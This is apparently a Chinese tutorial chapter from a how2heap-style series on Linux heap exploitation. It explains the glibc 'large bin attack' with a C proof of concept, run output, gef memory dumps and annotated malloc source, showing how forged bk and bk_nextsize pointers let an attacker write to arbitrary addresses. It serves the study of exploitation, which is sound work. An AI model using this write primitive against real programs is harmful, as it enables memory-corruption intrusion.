3.1.9 Linux 堆利用(四)

下载文件

how2heap

large_bin_attack

  1. #include<stdio.h>
  2. #include<stdlib.h>
  4. int main() {
  5.     unsigned long stack_var1 = 0;
  6.     unsigned long stack_var2 = 0;
  8.     fprintf(stderr, "The targets we want to rewrite on stack:\n");
  9.     fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
  10.     fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
  12.     unsigned long *p1 = malloc(0x100);
  13.     fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
  14.     malloc(0x10);
  16.     unsigned long *p2 = malloc(0x400);
  17.     fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
  18.     malloc(0x10);
  20.     unsigned long *p3 = malloc(0x400);
  21.     fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
  22.     malloc(0x10);
  24.     // deal with tcache - libc-2.26
  25.     // int *a[10], *b[10], i;
  26.     // for (i = 0; i < 7; i++) {
  27.     //     a[i] = malloc(0x100);
  28.     //     b[i] = malloc(0x400);
  29.     // }
  30.     // for (i = 0; i < 7; i++) {
  31.     //     free(a[i]);
  32.     //     free(b[i]);
  33.     // }
  35.     free(p1);
  36.     free(p2);
  37.     fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
  39.     malloc(0x30);
  40.     fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
  42.     p2[-1] = 0x3f1;
  43.     p2[0] = 0;
  44.     p2[2] = 0;
  45.     p2[1] = (unsigned long)(&stack_var1 - 2);
  46.     p2[3] = (unsigned long)(&stack_var2 - 4);
  47.     fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
  49.     free(p3);
  50.     malloc(0x30);
  51.     fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
  52.     fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
  53.     fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
  54. }
  1. $ gcc -g large_bin_attack.c
  2. $ ./a.out 
  3. The targets we want to rewrite on stack:
  4. stack_var1 (0x7fffffffdeb0): 0
  5. stack_var2 (0x7fffffffdeb8): 0
  7. Now, we allocate the first chunk: 0x555555757000
  8. Then, we allocate the second chunk(large chunk): 0x555555757130
  9. Finally, we allocate the third chunk(large chunk): 0x555555757560
  11. Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
  12. Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
  14. Now we use a vulnerability to overwrite the freed second chunk
  16. Finally, we free the third chunk and malloc again, targets should have already been rewritten:
  17. stack_var1 (0x7fffffffdeb0): 0x555555757560
  18. stack_var2 (0x7fffffffdeb8): 0x555555757560

该技术可用于修改任意地址的值,例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。

首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下:

  1. gef  x/2gx &stack_var1 
  2. 0x7fffffffde70:    0x0000000000000000    0x0000000000000000
  3. gef  x/4gx p1-2
  4. 0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1
  5. 0x555555757010:    0x0000000000000000    0x0000000000000000
  6. gef  x/8gx p2-6
  7. 0x555555757110:    0x0000000000000000    0x0000000000000021
  8. 0x555555757120:    0x0000000000000000    0x0000000000000000
  9. 0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2
  10. 0x555555757140:    0x0000000000000000    0x0000000000000000
  11. gef  x/8gx p3-6
  12. 0x555555757540:    0x0000000000000000    0x0000000000000021
  13. 0x555555757550:    0x0000000000000000    0x0000000000000000
  14. 0x555555757560:    0x0000000000000000    0x0000000000000411  <-- p3
  15. 0x555555757570:    0x0000000000000000    0x0000000000000000
  16. gef  x/8gx p3+(0x410/8)-2
  17. 0x555555757970:    0x0000000000000000    0x0000000000000021
  18. 0x555555757980:    0x0000000000000000    0x0000000000000000
  19. 0x555555757990:    0x0000000000000000    0x0000000000020671  <-- top
  20. 0x5555557579a0:    0x0000000000000000    0x0000000000000000

然后依次释放掉 p1 和 p2,这两个 free chunk 将被放入 unsorted bin:

  1. gef  x/8gx p1-2
  2. 0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1 [be freed]
  3. 0x555555757010:    0x00007ffff7dd3b78    0x0000555555757130
  4. 0x555555757020:    0x0000000000000000    0x0000000000000000
  5. 0x555555757030:    0x0000000000000000    0x0000000000000000
  6. gef  x/8gx p2-2
  7. 0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
  8. 0x555555757140:    0x0000555555757000    0x00007ffff7dd3b78
  9. 0x555555757150:    0x0000000000000000    0x0000000000000000
  10. 0x555555757160:    0x0000000000000000    0x0000000000000000
  11. gef  heap bins unsorted
  12. [ Unsorted Bin for arena 'main_arena' ]
  13. [+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
  14.     Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)      Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
  15. [+] Found 2 chunks in unsorted bin.

接下来随便 malloc 一个 chunk,则 p1 被切分为两块,一块作为分配的 chunk 返回,剩下的一块继续留在 unsorted bin(p1 的作用就在这里,如果没有 p1,那么切分的将是 p2)。而 p2 则被整理回对应的 large bin 链表中:

  1. gef  x/14gx p1-2
  2. 0x555555757000:    0x0000000000000000    0x0000000000000041  <-- p1-1
  3. 0x555555757010:    0x00007ffff7dd3c78    0x00007ffff7dd3c78
  4. 0x555555757020:    0x0000000000000000    0x0000000000000000
  5. 0x555555757030:    0x0000000000000000    0x0000000000000000
  6. 0x555555757040:    0x0000000000000000    0x00000000000000d1  <-- p1-2 [be freed]
  7. 0x555555757050:    0x00007ffff7dd3b78    0x00007ffff7dd3b78      <-- fd, bk
  8. 0x555555757060:    0x0000000000000000    0x0000000000000000
  9. gef  x/8gx p2-2
  10. 0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
  11. 0x555555757140:    0x00007ffff7dd3f68    0x00007ffff7dd3f68      <-- fd, bk
  12. 0x555555757150:    0x0000555555757130    0x0000555555757130      <-- fd_nextsize, bk_nextsize
  13. 0x555555757160:    0x0000000000000000    0x0000000000000000
  14. gef  heap bins unsorted
  15. [ Unsorted Bin for arena 'main_arena' ]
  16. [+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
  17.     Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
  18. [+] Found 1 chunks in unsorted bin.
  19. gef  heap bins large
  20. [ Large Bins for arena 'main_arena' ]
  21. [+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
  22.     Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
  23. [+] Found 1 chunks in 1 large non-empty bins.

整理的过程如下所示,需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列,如果大小相同则按照最近使用顺序排列:

  1.           /* place chunk in bin */
  3.           if (in_smallbin_range (size))
  4.             {
  5.                 [ ... ]
  6.             }
  7.           else
  8.             {
  9.               victim_index = largebin_index (size);
  10.               bck = bin_at (av, victim_index);
  11.               fwd = bck->fd;
  13.               /* maintain large bins in sorted order */
  14.               if (fwd != bck)
  15.                 {
  16.                   /* Or with inuse bit to speed comparisons */
  17.                   size |= PREV_INUSE;
  18.                   /* if smaller than smallest, bypass loop below */
  19.                   assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
  20.                   if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
  21.                     {
  22.                         [ ... ]
  23.                     }
  24.                   else
  25.                     {
  26.                       assert ((fwd->size & NON_MAIN_ARENA) == 0);
  27.                       while ((unsigned long) size < fwd->size)
  28.                         {
  29.                             [ ... ]
  30.                         }
  32.                       if ((unsigned long) size == (unsigned long) fwd->size)
  33.                         [ ... ]
  34.                       else
  35.                         {
  36.                           victim->fd_nextsize = fwd;
  37.                           victim->bk_nextsize = fwd->bk_nextsize;
  38.                           fwd->bk_nextsize = victim;
  39.                           victim->bk_nextsize->fd_nextsize = victim;
  40.                         }
  41.                       bck = fwd->bk;
  42.                     }
  43.                 }
  44.               else
  45.                 [ ... ]
  46.             }
  48.           mark_bin (av, victim_index);
  49.           victim->bk = bck;
  50.           victim->fd = fwd;
  51.           fwd->bk = victim;
  52.           bck->fd = victim;

假设我们有一个漏洞,可以对 large bin 里的 chunk p2 进行修改,结合上面的整理过程,我们伪造 p2 如下:

  1. gef  x/8gx p2-2
  2. 0x555555757130:    0x0000000000000000    0x00000000000003f1  <-- fake p2 [be freed]
  3. 0x555555757140:    0x0000000000000000    0x00007fffffffde60      <-- bk
  4. 0x555555757150:    0x0000000000000000    0x00007fffffffde58      <-- bk_nextsize
  5. 0x555555757160:    0x0000000000000000    0x0000000000000000

同样的,释放 p3,将其放入 unsorted bin,紧接着进行 malloc 操作,将 p3 整理回 large bin,这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size) 为假,程序将进入 else 分支,其中 fwd 是 fake p2,victim 是 p3,接着 bck 被赋值为 (&stack_var1 - 2)。

在 p3 被放回 large bin 并排序的过程中,我们位于栈上的两个变量也被修改成了 victim,对应的语句分别是 bck->fd = victim;ictim->bk_nextsize->fd_nextsize = victim;

  1. gef  x/2gx &stack_var1 
  2. 0x7fffffffde70:    0x0000555555757560    0x0000555555757560
  3. gef  x/8gx p2-2
  4. 0x555555757130:    0x0000000000000000    0x00000000000003f1
  5. 0x555555757140:    0x0000000000000000    0x0000555555757560
  6. 0x555555757150:    0x0000000000000000    0x0000555555757560
  7. 0x555555757160:    0x0000000000000000    0x0000000000000000
  8. gef  x/8gx p3-2
  9. 0x555555757560:    0x0000000000000000    0x0000000000000411
  10. 0x555555757570:    0x0000555555757130    0x00007fffffffde60
  11. 0x555555757580:    0x0000555555757130    0x00007fffffffde58
  12. 0x555555757590:    0x0000000000000000    0x0000000000000000

考虑 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,在 free 之前把两种大小的 tcache bin 都占满。

house_of_rabbit

house_of_roman

参考资料